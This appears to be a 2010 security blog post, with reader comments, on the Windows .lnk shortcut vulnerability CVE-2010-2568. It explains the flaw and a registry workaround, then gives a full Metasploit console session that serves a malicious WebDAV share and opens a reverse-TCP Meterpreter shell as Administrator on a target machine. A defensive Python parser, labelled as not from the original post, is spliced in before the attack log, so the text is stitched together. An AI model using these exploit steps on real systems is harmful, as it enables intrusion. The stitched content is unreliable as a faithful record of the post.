Windows “Shortcuts to Pawnage”
On 16th July 2010, researchers found a new shortcut to pawning remote systems in an unusual way. They crafted a way to exploit Windows shortcut files, commonly referred to as .lnk files, in order to gain unauthorized access to a remote computer.
Users need not even click the shortcut file; if they merely view it in Explorer, that's it... Game over!! Interesting, right?
Let's dig deeper to find the exact cause of this shortcut to pawnage.
Vulnerability:
There exists an unpatched vulnerability (CVE-2010-2568) in the Windows .lnk (shortcut) and .pif file parser code. Windows automatically executes the malicious code when a specially crafted .lnk/.pif file is read by Windows Explorer or any other application that displays icons for shortcuts. This vulnerability can be exploited locally from USB drives, over a network share, or even from remote WebDAV locations.
As this vulnerability is not related to buffer overflows or memory corruption, ASLR and Protected Mode will not help in preventing exploitation. All versions of Windows are affected by this vulnerability.
Exploitation:
According to the AV vendor VirusBlokAda, this vulnerability is already being exploited in the wild; they have seen fully patched Windows 7 machines infected by a worm exploiting it. See the references for the complete document on the worm analysis.
After successful exploitation of the vulnerability, the worm sends the message “SUCKM3 FROM EXPLORER.EXE MOTH4FUCKA #@!” to the Windows debugger.
Metasploit has also just released an exploit module for this attack, which uses a WebDAV location as the attack vector. We will have a complete demonstration of this exploit in the pawnage section.
Workarounds/Mitigation:
Microsoft is asking end users to apply the following registry workaround, which stops the Windows shell from displaying shortcut icons. When this workaround is implemented, shortcut files and Internet Explorer shortcuts will no longer have an icon displayed.
- Open RegEdit.
- Locate HKEY_CLASSES_ROOT\lnkfile\shellex\IconHandler.
- Change the value from {00021401-0000-0000-C000-000000000046} to “” (empty).
- Locate HKEY_CLASSES_ROOT\piffile\shellex\IconHandler.
- Change the value from {00021401-0000-0000-C000-000000000046} to “” (empty).
- Close RegEdit.
- Restart explorer.exe or reboot Windows.
Disabling the WebClient service will also help protect systems from attacks that use the WebDAV attack vector.
Pawnage demo:
Let's look at this demo of pawning a Windows XP box using Metasploit. In this demo, Metasploit directs victims to a malicious Windows share, served via WebDAV, that contains a specially crafted .lnk file and a malicious .dll file holding the actual payload.
As soon as this share on the attacker's box is read by the victim's shell (Windows Explorer in our case), the specially crafted .lnk file causes the payload .dll to be loaded into the address space of the victim's explorer.exe process, and the payload then delivers a shell.
Following are the steps followed by an attacker to exploit this vulnerability.
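As an added triage helper (not from the original post or from Metasploit), this Python snippet parses the MS-SHLLINK header and StringData of a .lnk file and flags shortcuts whose icon, working directory or relative path points at a network share or at a DLL outside the Windows directory, the combination the demo share above delivers. The sample shortcut is constructed inline from the share and DLL names in the demo; the real exploit carries its reference in the LinkTargetIDList, which this parser skips, so treat the output as a triage hint rather than a detector.

```python
"""Heuristic triage of Windows shortcut (.lnk) files: parse the MS-SHLLINK
header and StringData, then flag network-share or DLL references."""
import struct

HAS_ID_LIST, HAS_LINK_INFO, IS_UNICODE = 0x01, 0x02, 0x80
STRING_FLAGS = ((0x04, "name"), (0x08, "relative_path"), (0x10, "working_dir"),
                (0x20, "arguments"), (0x40, "icon_location"))  # fixed file order

def parse_lnk(data):
    """Return the StringData fields of a shell link as a dict."""
    if data[:4] != b"\x4c\x00\x00\x00":
        raise ValueError("not a shell link header")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    pos = 0x4c                                 # end of the fixed 76-byte header
    if flags & HAS_ID_LIST:                    # IDListSize (2 bytes) + IDList, skipped
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                  # LinkInfoSize is LinkInfo's first dword
        pos += struct.unpack_from("<I", data, pos)[0]
    width = 2 if flags & IS_UNICODE else 1     # UTF-16LE or ANSI characters
    fields = {}
    for bit, name in STRING_FLAGS:
        if flags & bit:
            count = struct.unpack_from("<H", data, pos)[0]
            pos += 2
            raw = data[pos:pos + count * width]
            fields[name] = raw.decode("utf-16-le" if width == 2 else "latin-1")
            pos += count * width
    return fields

def suspicious(fields):
    """Reasons to look closer: a UNC share reference, or a DLL referenced from
    outside the Windows directory (shell32.dll icons are normal and ignored)."""
    reasons = []
    for name in ("icon_location", "relative_path", "working_dir"):
        value = fields.get(name, "").lower()
        if value.startswith("\\\\"):
            reasons.append(f"{name} references a network share: {value}")
        if value.endswith(".dll") and "\\windows\\" not in value:
            reasons.append(f"{name} loads a library outside Windows: {value}")
    return reasons

def build_lnk(icon_location, working_dir=None):
    """Constructed sample for testing: header + Unicode StringData only."""
    flags = IS_UNICODE | 0x40 | (0x10 if working_dir else 0)
    header = b"\x4c\x00\x00\x00" + bytes(16) + struct.pack("<I", flags)
    header += bytes(0x4c - len(header))        # zero the rest of the header
    body = b""
    for s in ([working_dir] if working_dir else []) + [icon_location]:
        body += struct.pack("<H", len(s)) + s.encode("utf-16-le")
    return header + body
```

Run `suspicious(parse_lnk(open(path, "rb").read()))` over the shortcuts on a removable drive or share to list the ones worth a closer look.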
msf > use exploit/windows/browser/ms10_xxx_windows_shell_lnk_execute
msf exploit(ms10_xxx_windows_shell_lnk_execute) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms10_xxx_windows_shell_lnk_execute) > ifconfig
[*] exec: ifconfig
eth0 Link encap:Ethernet HWaddr 00:0c:29:73:7b:ff
inet addr:192.168.146.128 Bcast:192.168.146.255 Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:fe73:7bff/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:502 errors:0 dropped:0 overruns:0 frame:0
TX packets:36 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:50019 (50.0 KB) TX bytes:5554 (5.5 KB)
Interrupt:19 Base address:0x2000
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:16 errors:0 dropped:0 overruns:0 frame:0
TX packets:16 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:960 (960.0 B) TX bytes:960 (960.0 B)
msf exploit(ms10_xxx_windows_shell_lnk_execute) > set LHOST 192.168.146.128
LHOST => 192.168.146.128
msf exploit(ms10_xxx_windows_shell_lnk_execute) > show options
Module options:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host to listen on.
   SRVPORT  80               yes       The daemon port to listen on (do not change)
   URIPATH  /                yes       The URI to use (do not change).

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process
   LHOST     192.168.146.128  yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic
msf exploit(ms10_xxx_windows_shell_lnk_execute) > set SRVHOST 192.168.146.128
SRVHOST => 192.168.146.128
msf exploit(ms10_xxx_windows_shell_lnk_execute) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.146.128:4444
[*]
[*] Send vulnerable clients to \\192.168.146.128\ncSTz\
[*]
[*] Using URL: http://192.168.146.128:80/
[*] Server started.
msf exploit(ms10_xxx_windows_shell_lnk_execute) > [*] Responding to WebDAV OPTIONS request from 192.168.146.129:1035
[*] Responding to WebDAV OPTIONS request from 192.168.146.129:1035
[*] Responding to WebDAV OPTIONS request from 192.168.146.129:1035
[*] Responding to WebDAV OPTIONS request from 192.168.146.129:1035
[*] Responding to WebDAV OPTIONS request from 192.168.146.129:1035
[*] Responding to WebDAV OPTIONS request from 192.168.146.129:1035
[*] Responding to WebDAV OPTIONS request from 192.168.146.129:1035
[*] Received WebDAV PROPFIND request from 192.168.146.129:1035 /ncSTz
[*] Sending 301 for /ncSTz ...
[*] Received WebDAV PROPFIND request from 192.168.146.129:1035 /ncSTz/
[*] Sending directory multistatus for /ncSTz/ ...
[*] Received WebDAV PROPFIND request from 192.168.146.129:1035 /ncSTz
[*] Sending 301 for /ncSTz ...
[*] Received WebDAV PROPFIND request from 192.168.146.129:1035 /ncSTz/
[*] Sending directory multistatus for /ncSTz/ ...
[*] Received WebDAV PROPFIND request from 192.168.146.129:1035 /ncSTz
[*] Sending 301 for /ncSTz ...
[*] Received WebDAV PROPFIND request from 192.168.146.129:1035 /ncSTz/
[*] Sending directory multistatus for /ncSTz/ ...
[*] Received WebDAV PROPFIND request from 192.168.146.129:1035 /ncSTz
[*] Sending 301 for /ncSTz ...
[*] Received WebDAV PROPFIND request from 192.168.146.129:1035 /ncSTz/
[*] Sending directory multistatus for /ncSTz/ ...
[*] Received WebDAV PROPFIND request from 192.168.146.129:1035 /ncSTz/desktop.ini
[*] Sending 404 for /ncSTz/desktop.ini ...
[*] Sending LNK file to 192.168.146.129:1035 ...
[*] Received WebDAV PROPFIND request from 192.168.146.129:1035 /ncSTz/wwPSnSJ.dll.manifest
[*] Sending 404 for /ncSTz/wwPSnSJ.dll.manifest ...
[*] Sending DLL payload 192.168.146.129:1035 ...
[*] Received WebDAV PROPFIND request from 192.168.146.129:1035 /ncSTz/wwPSnSJ.dll.123.Manifest
[*] Sending 404 for /ncSTz/wwPSnSJ.dll.123.Manifest ...
[*] Sending stage (748032 bytes) to 192.168.146.129
[*] Meterpreter session 1 opened (192.168.146.128:4444 -> 192.168.146.129:1039) at Wed Jul 21 00:11:19 +0530 2010
msf exploit(ms10_xxx_windows_shell_lnk_execute) > sessions -l
Active sessions
===============

  Id  Type         Information                                      Connection
  --  ----         -----------                                      ----------
  1   meterpreter  VICTIM-AJG5DLK5\Administrator @ VICTIM-AJG5DLK5  192.168.146.128:4444 -> 192.168.146.129:1039
msf exploit(ms10_xxx_windows_shell_lnk_execute) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer: VICTIM-AJG5DLK5
OS : Windows XP (Build 2600, ).
Arch : x86
Language: en_US
GAME OVER!!!
Following is the video demonstration of the above attack using Metasploit.


July 24th, 2010 at 10:53 pm
When is the video coming?
July 25th, 2010 at 11:45 am
Just posted!!!
Enjoy
July 26th, 2010 at 12:31 am
Video is good. Thanks for sharing.
July 26th, 2010 at 8:35 am
Not bad, but nowhere near as 31337 as this rockstar! http://www.youtube.com/watch?v=SXmv8quf_xM&feature=player_embedded
July 27th, 2010 at 8:19 am
Very amusing